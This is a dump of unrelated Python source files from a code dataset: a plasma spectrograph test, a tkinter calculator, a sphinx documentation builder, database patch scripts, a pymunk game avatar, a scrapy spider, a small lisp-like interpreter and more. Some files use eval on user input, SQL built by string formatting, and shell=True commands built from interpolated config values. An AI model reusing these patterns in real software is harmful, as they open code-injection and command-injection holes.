plot_dispersion=True)\n    assert (np.logical_or(np.isclose(result_omega, omega, rtol=1e-3),\n                          np.isclose(result_omega, 0))).all(), (result_omega, omega)\n\n\ndef spectral_analysis(S, filename):\n    t = np.arange(S.NT + 1) * S.dt\n    dispersion_relation(t, S.grid.x, S.grid.charge_density_history, plot_spectro=True, plot_dispersion=False,\n                        title=filename + \"\\nCharge density\")\n    dispersion_relation(t, S.grid.x, S.grid.electric_field_history, plot_spectro=True, plot_dispersion=False,\n                        title=filename + \"\\nElectric field\")\n\n\nif __name__ == '__main__':\n    import Simulation\n\n    for i in range(1, 11):\n        filename = \"data_analysis/TS{}.hdf5\".format(i)\n        spectral_analysis(Simulation.load_data(filename), filename)\n    plt.show()\n","sub_path":"spectrograph.py","file_name":"spectrograph.py","file_ext":"py","file_size_in_byte":3382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
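A self-contained sketch of the per-k argmax idea that dispersion_relation implements above. It uses a plain np.fft.fft2 and keeps only the positive-omega half (the record applies rfft twice instead); the wave parameters mirror test_spectrograph:

import numpy as np

t = np.linspace(0, 1, 64, endpoint=False)
x = np.linspace(0, 12, 64, endpoint=False)
T, X = np.meshgrid(t, x, indexing='ij')
z = np.cos(6 * np.pi * X - 10 * np.pi * T)  # one travelling wave, omega = 10*pi

# 2-D spectrum over (t, x); keep the positive-omega rows only
spectrum = np.abs(np.fft.fft2(z))[: t.size // 2, :]
omega_vector = 2 * np.pi * np.fft.fftfreq(t.size, t[1] - t[0])[: t.size // 2]

# for every spatial-frequency column, pick the omega bin with the largest amplitude
maximal_omega = omega_vector[np.argmax(spectrum, axis=0)]
print(maximal_omega.max() / np.pi)  # ~10.0 in the column where the wave carries energy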
{"seq_id":"137522721","text":"#%%\nimport pymssql  # import the pymssql module\nimport numpy as np\nimport pandas as pd\n\nconn = pymssql.connect('127.0.0.1', None, None, 'dtest')\nwith conn.cursor(as_dict=False) as cursor:\n    sql = 'select title_word_seq from t_question where title_word_seq <> \\'-1\\''\n    cursor.execute(sql)\n    titles = cursor.fetchall()\n#%%\ntitles_vectors = []\ncount = 0\nfor title in titles:\n    vectors = []\n    words = title[0].split(',')\n    for word in words:\n        with conn.cursor() as cursor:\n            sql = 'select vectors from t_word where id = \\'{}\\''.format(word)\n            cursor.execute(sql)\n            vectors.append(np.array(cursor.fetchone()[0].split(' ')).astype(np.float16))\n    titles_vectors.append(np.array(vectors))\n\n    count += 1\n    if count%2000 == 0:\n        print(\"{}/{}\".format(count, len(titles)))\n\ndel titles\nnp.save('./title_word.npy', titles_vectors)","sub_path":"project/question_embed/title_RD.py","file_name":"title_RD.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"26123954","text":"from tkinter import Tk\nfrom tkinter import StringVar,Entry,Button\nimport math\n\nclass calculator:\n    def __init__(self):\n        window=Tk()\n        window.title('Tk-based Scientific Calculator')\n        window.configure(background=\"white\")\n        self.string=StringVar()\n        entry=Entry(window,textvariable=self.string,)\n        entry.grid(row=0,column=0,columnspan=6)\n        entry.configure(background=\"white\")\n        entry.focus()\n        \n        values=[\"C\",\"DEL\",\"(\",\")\",\"%\",\"gcd\",\n                \"sin\",\"sqrt\",\"e\",\"pow\",\"/\",\"radians\",\n                \"cos\",\"7\",\"8\",\"9\",\"*\",\"degrees\",\n                \"tan\",\"4\",\"5\",\"6\",\"-\",\"ceil\",\n                \"pi\",\"1\",\"2\",\"3\",\"+\",\"hypot\",\n                \"log\",\",\",\"0\",\".\",\"=\"]\n        \n        text=1\n        i=0\n        row=1\n        col=0\n        for txt in values:\n            padx=10\n            pady=10\n            if(i==6):\n                row=2\n                col=0\n            if(i==12):\n                row=3\n                col=0\n            if(i==18):\n                row=4\n                col=0\n            if(i==24):\n                row=5\n                col=0\n            if(i==30):\n                row=6\n                col=0\n            if(txt=='='):\n                btn=Button(window,height=2,width=4,padx=50,pady=pady,text=txt,command=lambda txt=txt:self.equals())\n                btn.grid(row=row,column=col,columnspan=3,padx=2,pady=2)\n                btn.configure(background=\"yellow\")\n\n            elif(txt=='DEL'):\n                btn=Button(window,height=2,width=4,padx=padx,pady=pady, text=txt ,command=lambda txt=txt:self.delete())\n                btn.grid(row=row,column=col,padx=1,pady=1)\n                btn.configure(background=\"grey\")\n            elif(txt=='C'):\n                btn=Button(window,height=2,width=4,padx=padx,pady=pady,text=txt,command=lambda txt=txt:self.clearall())\n                btn.grid(row=row,column=col,padx=1,pady=1)\n                btn.configure(background=\"red\")\n            else:\n                btn=Button(window,height=2,width=4,padx=padx,pady=pady,text=txt ,command=lambda txt=txt:self.addChar(txt))\n                btn.grid(row=row,column=col,padx=1,pady=1)\n                btn.configure(background=\"white\")\n\n            col=col+1\n            i=i+1\n        window.mainloop()\n    \n\n    def clearall(self):\n        self.string.set(\"\")\n\n    def equals(self):\n        result=\"\"\n\n        try:\n            result=eval(self.string.get())\n            self.string.set(result)\n        except:\n            result=\"Invalid input\"\n            self.string.set(result)\n    \n    def addChar(self,char):\n        i = ['log','sqrt','pi','sin','cos','tan','e',\"gcd\",\"radians\",\"degrees\",\"ceil\",\"hypot\"]\n        if char in i:\n            self.string.set(self.string.get()+'math.'+(str(char)))\n        else:\n            self.string.set(self.string.get()+(str(char)))\n    \n    def delete(self):\n        self.string.set(self.string.get()[0:-1])\n    \ncalculator()\n","sub_path":"Scientific_Calculator.py","file_name":"Scientific_Calculator.py","file_ext":"py","file_size_in_byte":2959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"5596185","text":"\"\"\"Create documentation for the project.\"\"\"\nimport json\nimport subprocess\nfrom string import Template\nfrom typing import Dict, Any\nfrom pmfp.const import (\n    DOC_PATH,\n    PROJECT_HOME,\n    PMFP_DOC_TEMP,\n    JS_ENV_PATH\n)\nimport chardet\nfrom .utils import new_json_package\n\n\ndef js_document(config: Dict[str, Any]):\n    \"\"\"Create documentation for a js project.\n\n    Args:\n        config (Dict[str, Any]): project configuration.\n    \"\"\"\n    new_json_package(config)\n    command = \"npm install --save-dev esdoc\"\n    res = subprocess.run(command, capture_output=True, shell=True)\n    if res.returncode != 0:\n        print(\"Failed to install esdoc, a dependency for building the js docs\")\n        encoding = chardet.detect(res.stderr).get(\"encoding\")\n        print(res.stderr.decode(encoding))\n    else:\n        command = \"npm install --save-dev esdoc-publish-markdown-plugin\"\n        res = subprocess.run(command, capture_output=True, shell=True)\n        if res.returncode != 0:\n            print(\"Failed to install esdoc-publish-markdown-plugin, a dependency for building the js docs\")\n            encoding = chardet.detect(res.stderr).get(\"encoding\")\n            print(res.stderr.decode(encoding))\n        else:\n            docs = PROJECT_HOME.joinpath(\"docs\")\n            if not docs.exists():\n                docs.mkdir(parents=True, exist_ok=False)\n            with open(str(JS_ENV_PATH), encoding=\"utf-8\") as f:\n                content = json.load(f)\n            with open(str(JS_ENV_PATH), \"w\", encoding=\"utf-8\") as f:\n                content.update({\n                    \"esdoc\": {\n                        \"destination\": \"./docs\",\n                        \"source\": \"./es\",\n                        \"includes\": [r\"\\\\.js$\"],\n                        \"excludes\": [r\"\\\\.config\\\\.js$\"],\n                        \"plugins\": [\n                            {\n                                \"name\": \"esdoc-standard-plugin\"\n                            }\n                        ]\n                    },\n                })\n                json.dump(content, f)\n\n\ndef default_document(config: Dict[str, Any], language: str) -> bool:\n    \"\"\"Default documentation.\n\n    Uses sphinx to create the documentation by default. At least python uses this.\n\n    Args:\n        config (Dict[str, Any]): project configuration.\n        language (str): the project's programming language.\n\n    Returns:\n        bool: True if creation succeeded\n\n    \"\"\"\n    if DOC_PATH.exists():\n        print(\"The document folder already exists\")\n        return False\n    else:\n        package_path = PROJECT_HOME.joinpath(config[\"project-name\"])\n        project_name = config[\"project-name\"]\n        author = config[\"author\"]\n        version = config[\"version\"]\n        if package_path.exists():\n            command = f\"sphinx-apidoc -F -H {project_name} -A {author} -V {version} -a -o document {project_name}\"\n        else:\n            command = f\"sphinx-apidoc -F -H {project_name} -A {author} -V {version} -a -o document .\"\n        res = subprocess.run(command, capture_output=True, shell=True)\n        if res.returncode != 0:\n            print(\"Failed to generate the api documentation\")\n            encoding = chardet.detect(res.stderr).get(\"encoding\")\n            print(res.stderr.decode(encoding))\n        else:\n            doc_conf = PMFP_DOC_TEMP.joinpath(language).open(encoding=\"utf-8\").read()\n            #doc_conf_temp = Template(doc_conf)\n            with open(\"document/conf.py\", \"w\", encoding=\"utf-8\") as f:\n                f.write(doc_conf)\n            print('Finished initializing the documentation source files')\n            print(\"Building the project documentation\")\n            command = \"sphinx-build -b html document docs\"\n            res = subprocess.run(command, capture_output=True, shell=True)\n            if res.returncode != 0:\n                print(\"Failed to build the project documentation\")\n                encoding = chardet.detect(res.stderr).get(\"encoding\")\n                print(res.stderr.decode(encoding))\n            else:\n                docs = PROJECT_HOME.joinpath(\"docs\")\n                nojekyll = docs.joinpath(\".nojekyll\")\n                if not nojekyll.exists():\n                    with nojekyll.open(\"w\", encoding=\"utf-8\") as f:\n                        pass\n                print(\"Finished building the project documentation!\")\n                print(\"Initializing the i18n part of the project documentation\")\n                command = \"sphinx-build -b gettext document docs/locale\"\n                res = subprocess.run(command, capture_output=True, shell=True)\n                if res.returncode != 0:\n                    print(\"Failed to build the files awaiting translation\")\n                    encoding = chardet.detect(res.stderr).get(\"encoding\")\n                    print(res.stderr.decode(encoding))\n                else:\n                    command = \"sphinx-intl update -p docs/locale -d document/locale -l zh -l en\"\n                    res = subprocess.run(command, capture_output=True, shell=True)\n                    if res.returncode != 0:\n                        print(\"Failed to update the files awaiting translation\")\n                        encoding = chardet.detect(res.stderr).get(\"encoding\")\n                        print(res.stderr.decode(encoding))\n                    else:\n                        print(\"Finished initializing the i18n part of the project documentation!\")\n    print('Finished creating the project documentation')\n    return True\n\n\ndef new_document(config: Dict[str, Any], language: str):\n    \"\"\"Initialize the sphinx documentation.\n\n    Args:\n        config (Dict[str, Any]): project configuration.\n        language (str): the project's programming language.\n    \"\"\"\n    print('Creating the project documentation')\n    if language == \"javascript\":\n        js_document(config)\n    else:\n        default_document(config, language)\n","sub_path":"pmfp/new/_new_doc.py","file_name":"_new_doc.py","file_ext":"py","file_size_in_byte":5437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"545885629","text":"# -*- coding: utf-8 -*-\nimport os, sys\nimport 
datetime\nfrom bson import ObjectId\nreload(sys)\nsys.setdefaultencoding(\"utf-8\")\n\nsys.path.append(os.path.join(os.path.split(os.path.realpath(__file__))[0], '../util'))\nimport loghelper, db\n\n#logger\nloghelper.init_logger(\"patch_funding_companyid\", stream=True)\nlogger = loghelper.get_logger(\"patch_funding_companyid\")\n\n'''\nselect distinct corporateId from funding where (active is null or active='Y') and \ncorporateId in ( select corporateId from (select corporateId, count(*) cnt from company where active is null or active='Y' group by corporateId having cnt>1) a);\n'''\n\nconn = db.connect_torndb()\nmongo = db.connect_mongo()\n\ndef get_company_ids(corporate_id):\n company_ids = []\n items = conn.query(\"select id from company where corporateId=%s\", corporate_id)\n for item in items:\n company_ids.append(item[\"id\"])\n return company_ids\n\n\ndef guess_company_id(funding):\n items = conn.query(\"select id from company where (active is null or active='Y') and corporateId=%s order by id\",\n funding[\"corporateId\"])\n if len(items) == 0:\n items = conn.query(\"select id from company where (active is null or active!='N') and corporateId=%s order by id\",\n funding[\"corporateId\"])\n\n if len(items) == 0:\n items = conn.query(\"select id from company where corporateId=%s order by id\",\n funding[\"corporateId\"])\n\n if len(items) == 1:\n return items[0][\"id\"]\n\n news_id = funding[\"newsId\"]\n company_id = guess_by_news(news_id, items)\n if company_id is not None:\n return company_id\n\n logger.info(\"get the first one! fundingId=%s, corporateId=%s\", funding[\"id\"], funding[\"corporateId\"])\n return items[0][\"id\"]\n\n\ndef guess_by_news(news_id,items):\n if news_id is None or news_id.strip()==\"\":\n return None\n news = mongo.article.news.find_one({\"_id\": ObjectId(news_id)})\n if news is None:\n return None\n\n guess_company_ids = []\n company_ids = []\n for item in items:\n company_ids.append(item[\"id\"])\n\n news_company_ids = news[\"companyIds\"]\n for company_id in news_company_ids:\n if company_id in company_ids:\n guess_company_ids.append(company_id)\n if len(guess_company_ids) == 0:\n return None\n elif len(guess_company_ids) == 1:\n return guess_company_ids[0]\n else:\n logger.info(\"more than one company attached with the news %s\", news_id)\n return None\n\n\ndef main():\n no_company_funding_cnt = 0\n # fundings = conn.query(\"select * from funding where (active is null or active='Y' or active='P') and companyId is null order by id desc\")\n fundings = conn.query(\"select * from funding where companyId is null order by id desc\")\n for funding in fundings:\n corporate_id = funding[\"corporateId\"]\n company_ids = get_company_ids(corporate_id)\n if len(company_ids) == 0:\n logger.info(\"no company! fundingId=%s, corporateId=%s\", funding[\"id\"], corporate_id)\n no_company_funding_cnt += 1\n continue\n elif len(company_ids) == 1:\n company_id = company_ids[0]\n else:\n company_id = guess_company_id(funding)\n\n conn.update(\"update funding set companyId=%s where id=%s\", company_id, funding[\"id\"])\n\n logger.info(\"no_company_funding_cnt=%s\", no_company_funding_cnt)\n\n\ndef verify():\n fundings = conn.query(\"select * from funding where active is null or active !='N' order by id desc\")\n for funding in fundings:\n company_id = funding[\"companyId\"]\n corporate_id = funding[\"corporateId\"]\n if company_id is None:\n logger.info(\"companyId is None. 
fundingId=%s\", funding[\"id\"])\n continue\n company = conn.get(\"select * from company where id=%s\", company_id)\n if company is None:\n logger.info(\"company not exist. fundingId=%s\", funding[\"id\"])\n continue\n if company[\"corporateId\"] != corporate_id:\n logger.info(\"company corporate not the same. fundingId=%s\", funding[\"id\"])\n\n\nif __name__ == \"__main__\":\n main()\n # verify()","sub_path":"data/patch/patch_funding_companyid.py","file_name":"patch_funding_companyid.py","file_ext":"py","file_size_in_byte":4170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"178652934","text":"# http://stackoverflow.com/questions/26282338/parse-maillog-in-python\nimport re, sys\n\nlines = []\nqueue_id = []\nf_h = open('maillog', 'r')\n\ndef Find_Email(pattern,text):\n email = re.search(pattern, text)\n if email:\n lines.append(text)\n q_id = re.search('[A-F0-9]{10}', text)\n print(text)\n if q_id:\n queue_id.append(q_id.group())\n\n\nfor line in f_h:\n Find_Email(r'recipient@gmil.com',line)","sub_path":"L00.Test/parser_postfix_log.py","file_name":"parser_postfix_log.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"45729234","text":"'''\n\n'''\n\nimport math\nimport pyglet\nfrom pyglet import *\nfrom pyglet.window import key\nimport pymunk\nfrom pymunk.vec2d import Vec2d\nimport py2d\nfrom py2d.director import Director\nfrom py2d import actor\nfrom py2d import keyboard\n\ndx = 150\n\nplatform_collType = 1\n\nPLAYER_VELOCITY = 200.\nPLAYER_GROUND_ACCEL_TIME = 0.05\nPLAYER_GROUND_ACCEL = (PLAYER_VELOCITY / PLAYER_GROUND_ACCEL_TIME)\n\nPLAYER_AIR_ACCEL_TIME = 0.05\nPLAYER_AIR_ACCEL = (PLAYER_VELOCITY/PLAYER_AIR_ACCEL_TIME)\n\nJUMP_HEIGHT = 48\nJUMP_BOOST_HEIGHT = 24.\nJUMP_CUTOFF_VELOCITY = 100\nFALL_VELOCITY = 500.\nJUMP_LENIENCY = 0.05\nHEAD_FRICTION = 0.7\n\nJUMP_TIMES = 2\n\n\nclass Avatar(py2d.actor.PhysicalActor):\n\tkeyboard = keyboard.Keyboard()\n\tremaining_jumps = 0\n\t\n\n\tdef __init__(self, window, batch=None):\n\t\tanim = self.loadAnimation(\"zombieright.png\", 1, 4, 0.1, True, True)\n\t\tsuper(Avatar, self).__init__(anim, batch)\n\t\twindow.push_handlers(self.keyboard)\n\t\tself.keyboard.keyPressHandler = self.keyRelease\n\t\tself.initPhysics()\n\t\t#self.landing = {'p':Vec2d.zero(), 'n':0}\n\t\tself.landed_previous = False\n\t\tself.jumpTrigger = False\n\t\t\n\tdef initPhysics(self):\n\t\tself.feet = pymunk.Circle(self.body, 20, (0,0))\n\t\tself.mid = pymunk.Circle(self.body, 20, (0,40))\n\t\tself.head = pymunk.Circle(self.body, 20, (0,75))\n\t\tself.feet.collisionType = platform_collType\n\t\tself.feet.elasticity = 1.\n\t\t\n\t\tself.platformNormal = Vec2d.zero()\n\t\tself.platformBody = None\n\t\t\n\t\tself.slide = False\n\n\tdef addedToScene(self, scene):\n\t\tsuper(Avatar, self).addedToScene(scene)\n\t\tscene.space.add(self.feet)\n\t\tscene.space.add(self.mid)\n\t\tscene.space.add(self.head)\n\n\tdef keyRelease(self, symbol, modifier):\n\t\tif symbol == key.M:\n\t\t\tself.body.angle += math.radians(40)\n\t\t\n\t\tif symbol == key.UP:\n\t\t\tself.jumpTrigger = True\n\n\tdef set_position(self,x,y):\n\t\tself.body.position = x,y\n\t\tsuper(Avatar, self).set_position(x,y)\n\n\n\tdef update(self, dt):\n\t\tdef f(arbiter):\n\t\t\tn = -arbiter.contacts[0].normal\n\t\t\tif n.y > 0.0:\n\t\t\t\tself.platformNormal = n\n\t\t\t\tself.platformBody = arbiter.shapes[1].body\n\t\t\n\t\tself.platformNormal = 
Vec2d.zero()\n\t\tself.platformBody = None\n\t\tself.body.each_arbiter(f)\n\t\t\n\t\t# if ground body is found and slope induced grounding normal is lower than feet friction\n\t\t# (find out if grounded)\n\t\tgrounded = False\n\t\tground_velocity = Vec2d.zero()\n\t\tif self.platformBody != None and abs(self.platformNormal.x / self.platformNormal.y) < self.feet.friction:\n\t\t\tgrounded = True\n\t\t\tself.remaining_jumps = JUMP_TIMES\n\t\t\tground_velocity = self.platformBody.velocity\n\t\t\t\n\t\t# control inputs\n\t\ttargetXVel = 0\n\t\tif self.keyboard[key.LEFT]:\n\t\t\ttargetXVel -= PLAYER_VELOCITY\n\t\tif self.keyboard[key.RIGHT]:\n\t\t\ttargetXVel += PLAYER_VELOCITY\n\t\tif self.keyboard[key.DOWN]:\n\t\t\tself.slide = True\n\t\telse:\n\t\t\tself.slide = False\n\t\tif self.jumpTrigger == True:\n\t\t\tself.jumpTrigger = False\n\t\t\tif grounded or self.remaining_jumps > 0:\n\t\t\t\t# add target jump velocity to body: v = sqrt(2 * h * g) reaches height h under gravity g\n\t\t\t\tjumpVel = math.sqrt(2.0 * JUMP_HEIGHT * abs(self.scene.space.gravity.y))\n\t\t\t\tself.body.velocity.y = ground_velocity.y + jumpVel\n\t\t\t\tself.remaining_jumps -=1\n\t\t\n\t\t# if on ground\n\t\tif self.platformBody != None:\n\t\t\t# if slide key and on slope (normal is (0,1) when on level ground)\n\t\t\tif self.slide == True and (self.platformNormal.x / self.platformNormal.y) != 0.:\n\t\t\t\tself.feet.friction = 0\n\t\t\telse:\n\t\t\t\tself.feet.friction = abs(PLAYER_GROUND_ACCEL / self.scene.space.gravity.y)\n\t\t\tself.head.friction = HEAD_FRICTION\n\t\t\t# apply target x velocity to surface velocity of feet..\n\t\t\tself.feet.surface_velocity = targetXVel, 0\n\t\telse:\n\t\t\tself.feet.friction,self.head.friction = 0,0\n\t\t\tself.body.apply_impulse((targetXVel/6,0))\n\t\t\t\n\t\t# fall rate limiter\n\t\tself.body.velocity.y = max(self.body.velocity.y, -FALL_VELOCITY) # clamp upwards as well?\n\t\t\t\n\t\tsuper(Avatar, self).update(dt)\n\t\t\n","sub_path":"game/avatar.py","file_name":"avatar.py","file_ext":"py","file_size_in_byte":3775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"300915230","text":"__author__ = 'student'\nimport numpy as np\nfrom matplotlib import mlab\nimport pylab\n\ntmin = -20.0\ntmax = 20.0\ndt = 0.01\ntlist = mlab.frange (tmin, tmax, dt)\n\npylab.ion()\n\nfor a in range (1000):\n    ylist = [np.cos(2*t) for t in tlist]\n    xlist = [np.sin(t+a/10) for t in tlist]\n    pylab.clf()\n    pylab.plot (xlist, ylist)\n    pylab.draw()\n\npylab.close()","sub_path":"7no4.py","file_name":"7no4.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"433113620","text":"from scrapy import Spider, Request, Field, Item\nfrom scrapy.http import FormRequest\nfrom oldtimertrends.items import Car\n\nclass Lvacrawler(Spider):\n    name = \"lva_quote\"\n    start_urls = [\n        'https://www.lva-auto.fr/cote.php?idMarque=MA55&idModele=-1&rechercheType=1'\n    ]\n\n    def parse(self, response):\n        auction_url = response.css('.link-result a::attr(href)').get()\n        mycar = Car()\n        for quote in response.css('ul.cote li'):\n            mycar['auction_url'] = auction_url\n            mycar['quote_id'] = auction_url.split(\"=\")[1] if mycar['auction_url'] else None\n            \n            \n\n        next_page = response.css('a.nextItem ::attr(href)').get()\n\n        print(next_page)\n        if next_page != \"javascript:void()\":\n\n            \n            yield Request(response.urljoin(next_page), callback=self.parse, dont_filter=True)\n\n        
","sub_path":"oldtimertrends/spiders/lvatrendsquote.py","file_name":"lvatrendsquote.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"567555335","text":"import math\r\nfrom pteromyini.core.model import Model\r\nfrom pteromyini.interpreter.function import Function\r\nfrom pteromyini.interpreter.function_executor import FunctionExecutor, DefaultMethods, Methods\r\nfrom pteromyini.interpreter.heap import Heap\r\nfrom pteromyini.interpreter.parse_tools import Tools\r\nfrom pteromyini.interpreter.struct import Struct\r\nimport re\r\n\r\n\r\nclass ModelIsNoneException(Exception):\r\n pass\r\n\r\n\r\nclass Interpreter:\r\n def __init__(self, model: Model = None):\r\n self.set_model(model)\r\n\r\n def copy(self):\r\n return Interpreter(self._model)\r\n\r\n def set_model(self, model: Model):\r\n self._model = model\r\n\r\n def execute(self, src: str, methods: Methods = None, function_executor: FunctionExecutor = None):\r\n \"\"\"\r\n heap - not complete\r\n\r\n get code in str, interpreted and execute\r\n return result in string\r\n\r\n Syntax:\r\n {id} -> insert value from model \"model.get_value(id)\"\r\n (xpath (node attribute value)) -> execute xpath function with args: node, attribute, value\r\n (xpath (node attribute {id})) -> execute xpath function with args: node, attribute, value (get by id in model)\r\n * asfsdaf (random) fasdfd (random_str) afasdf -> asfsdaf 123 fasdfd some_random_string afasdf\r\n \"\"\"\r\n if function_executor is None:\r\n function_executor = self.build_executor(methods)\r\n if src[0:3] == src[-3:] == '\"\"\"':\r\n return src[3:-3]\r\n src = self._load_var(src, function_executor) # TODO: before paste var require verify on [\"()whitespace]\r\n text_and_code = Tools.split_to_text_and_code(src)\r\n results = []\r\n for item in text_and_code:\r\n if item[0] == '(':\r\n results.append(self._execute_code(item, function_executor))\r\n else:\r\n item_with_var = function_executor.heap.paste_vars(item)\r\n results.append(item_with_var)\r\n return results\r\n\r\n def _load_var(self, code, function_executor: FunctionExecutor) -> str:\r\n members = re.findall(r\"(? 
0:\r\n raise ModelIsNoneException()\r\n if self._model is None:\r\n return code\r\n data = Struct(self._model.fields)\r\n for member in members:\r\n value = eval(f'data.{member[0][1:-1]}')\r\n # value = value.replace(')', '\\\\)').replace('(', '\\\\(')\r\n name = function_executor.heap.save_value(value)\r\n code = code.replace(member[0], name)\r\n code = code.replace('\\\\{', '{').replace('\\\\}', '}')\r\n return code\r\n\r\n def _execute_code(self, code, function_executor):\r\n return self.build_trees(code, function_executor).execute()\r\n\r\n def build_trees(self, code, function_executor):\r\n code_tuple = self.convert_to_tuple(code)\r\n return Function(code_tuple, function_executor)\r\n\r\n def convert_to_tuple(self, code: str):\r\n \"\"\"\r\n Convert like lisp code to python tuple\r\n :param code: like lisp (foo 123 (foo2 \"asdf\"))\r\n :return: tuple\r\n \"\"\"\r\n # find position \"string\" and escape charecters in code\r\n all_ignore = [(m.start(0), m.end(0)) for m in re.finditer(r'(\\\"[^\"]*\\\")|(\\\\\\()|(\\\\\\))', code)]\r\n all_ignore.append((len(code), (len(code)))) # it's for run last iteration or at least one\r\n last_end = 0 # index to start next iteration parsing code\r\n converted = '' # result tuple in repr (string) view\r\n last_escaped = False # mark if in previous iteration character is escaped\r\n\r\n # code array parsing\r\n for start, end in all_ignore:\r\n parentheses_space = code[last_end:start].replace('(', ' ( ').replace(')', ' ) ') # add space\r\n space_splt = re.compile(r\"\\s\").split(parentheses_space) # split by space, convert str to array\r\n space_splt = list(filter(lambda a: a.strip() != \"\", space_splt)) # remove empty item\r\n size = len(space_splt) - 1\r\n\r\n # add operators\r\n for counter, value in enumerate(space_splt):\r\n if value in [')', '(']:\r\n if value == ')':\r\n if (counter != size and space_splt[counter + 1] != ')') or \\\r\n (counter == size and start < len(code) - 1 and code[start] != ')'):\r\n converted = f\"{converted} {value},\"\r\n else:\r\n converted = f\"{converted} {value}\"\r\n if value == '(':\r\n converted = f\"{converted} {value}\"\r\n else:\r\n if last_escaped and code[last_end] != ' ':\r\n converted = f\"{converted[0:-2]}{value}',\"\r\n else:\r\n converted = f\"{converted} '{value}',\"\r\n last_escaped = False\r\n\r\n # add str or escaped\r\n if math.fabs(start - end) > 0:\r\n text = code[start:end]\r\n text = text.replace(\"'\", \"\\\\'\")\r\n if text[0] == '\\\\':\r\n text = text[1:]\r\n last_escaped = True\r\n if not last_escaped:\r\n if code[start] == code[end - 1] == '\"':\r\n converted = f\"{converted} '{text}',\"\r\n elif last_escaped:\r\n if code[end - 1 + start - end] not in [' ', '(', ')']:\r\n # check that char located in args, not independent\r\n converted = f\"{converted[0:-2]}{text}',\"\r\n else:\r\n converted = f\"{converted} '{text}',\"\r\n last_end = end\r\n r = eval(converted) # if one args in code it can return str\r\n if type(r) is not tuple:\r\n r = (r,)\r\n return r\r\n\r\n def build_executor(self, methods=None):\r\n _methods = [DefaultMethods()]\r\n if type(methods) is list:\r\n _methods.extend(methods)\r\n elif methods is not None:\r\n _methods.append(methods)\r\n executor = FunctionExecutor(self._model)\r\n for m in _methods:\r\n executor.bind_methods(m)\r\n return 
executor\r\n","sub_path":"custom_library/pteromyini/pteromyini/interpreter/interpreter.py","file_name":"interpreter.py","file_ext":"py","file_size_in_byte":6363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"110081216","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\ngraphics = np.load('graphics56.npy')\ngraphics = graphics[::-1]\nfig = plt.figure()\nax = fig.add_subplot(111)\nfig.suptitle('Snapshots of the street every 1000 time steps with occupancy rate 5/6\\nWhite is occupied Black is vacant')\nax.set_ylabel('Time')\nax.set_xlabel('Parking Space number')\nplt.ion()\nplt.imshow(graphics, cmap='gray', interpolation='none')\nplt.gca().invert_yaxis()\nplt.show()\nplt.savefig('spacesevery1000steps_OR56.png')","sub_path":"Spaces_Graphics.py","file_name":"Spaces_Graphics.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"140113776","text":"\n# coding: utf-8\n\n# # Traffic Light Classifier\n# ---\n# \n# In this project, you’ll use your knowledge of computer vision techniques to build a classifier for images of traffic lights! You'll be given a dataset of traffic light images in which one of three lights is illuminated: red, yellow, or green.\n# \n# In this notebook, you'll pre-process these images, extract features that will help us distinguish the different types of images, and use those features to classify the traffic light images into three classes: red, yellow, or green. The tasks will be broken down into a few sections:\n# \n# 1. **Loading and visualizing the data**. \n# The first step in any classification task is to be familiar with your data; you'll need to load in the images of traffic lights and visualize them!\n# \n# 2. **Pre-processing**. \n# The input images and output labels need to be standardized. This way, you can analyze all the input images using the same classification pipeline, and you know what output to expect when you eventually classify a *new* image.\n# \n# 3. **Feature extraction**. \n# Next, you'll extract some features from each image that will help distinguish and eventually classify these images.\n# \n# 4. **Classification and visualizing error**. \n# Finally, you'll write one function that uses your features to classify *any* traffic light image. This function will take in an image and output a label. You'll also be given code to determine the accuracy of your classification model. \n# \n# 5. **Evaluate your model**.\n# To pass this project, your classifier must be >90% accurate and never classify any red lights as green; it's likely that you'll need to improve the accuracy of your classifier by changing existing features or adding new features. I'd also encourage you to try to get as close to 100% accuracy as possible!\n# \n# Here are some sample images from the dataset (from left to right: red, green, and yellow traffic lights):\n# \n# \n\n# ---\n# ### *Here's what you need to know to complete the project:*\n# \n# Some template code has already been provided for you, but you'll need to implement additional code steps to successfully complete this project. Any code that is required to pass this project is marked with **'(IMPLEMENTATION)'** in the header. There are also a couple of questions about your thoughts as you work through this project, which are marked with **'(QUESTION)'** in the header. 
Make sure to answer all questions and to check your work against the [project rubric](https://review.udacity.com/#!/rubrics/1213/view) to make sure you complete the necessary classification steps!\n# \n# Your project submission will be evaluated based on the code implementations you provide, and on two main classification criteria.\n# Your complete traffic light classifier should have:\n# 1. **Greater than 90% accuracy**\n# 2. ***Never* classify red lights as green**\n# \n\n# # 1. Loading and Visualizing the Traffic Light Dataset\n# \n# This traffic light dataset consists of 1484 number of color images in 3 categories - red, yellow, and green. As with most human-sourced data, the data is not evenly distributed among the types. There are:\n# * 904 red traffic light images\n# * 536 green traffic light images\n# * 44 yellow traffic light images\n# \n# *Note: All images come from this [MIT self-driving car course](https://selfdrivingcars.mit.edu/) and are licensed under a [Creative Commons Attribution-ShareAlike 4.0 International License](https://creativecommons.org/licenses/by-sa/4.0/).*\n\n# ### Import resources\n# \n# Before you get started on the project code, import the libraries and resources that you'll need.\n\n# In[346]:\n\n\n\"\"\"Traffic Light Classifier.\nComputer vision techniques to build a classifier,\nfor images of traffic lights. \n\"\"\" \nimport cv2 # computer vision library\nimport helpers # helper functions\nimport random # for random test images\nimport scipy.stats # 